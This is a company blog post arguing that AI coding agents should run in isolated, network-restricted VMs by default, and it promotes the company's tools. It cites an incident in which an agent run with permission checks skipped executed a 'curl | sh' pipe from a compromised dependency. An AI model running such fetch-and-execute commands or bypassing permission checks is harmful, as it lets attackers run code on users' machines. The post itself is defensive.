Liwala — Infrastructure for AI Coding Agents

agents//blog/security-is-the-default.mdraw .md →
# Security Is the Default, Not the Flag

*April 2026*

Last Tuesday, the axios supply chain attack hit. An agent running with `--dangerously-skip-permissions` on someone's host machine executed `curl | sh` from a compromised dependency.

This is not theoretical. This is happening now.

The industry norm for AI coding agents is: give it full disk access, full network access, full shell access, and hope for the best. The "security" option is a flag you have to remember to set.

We think that's backwards.

## Our approach

**letai** runs every agent in an isolated VM. Network is hardened by default — only ports 443, 22, and 53 are open. You can add domain allowlists. Each task gets its own git branch. The agent can't touch main.

**IntentLink** catches drift before it ships. The LLM compiles your intent, deterministic tools verify the implementation matches. Runs on CI.

**Vibe of Home** catalogs the vulnerabilities that vibe coding introduces — patterns not in existing CVE databases.

Security shouldn't be opt-in. It should be the starting point.

---

*— Luisa*
← back to index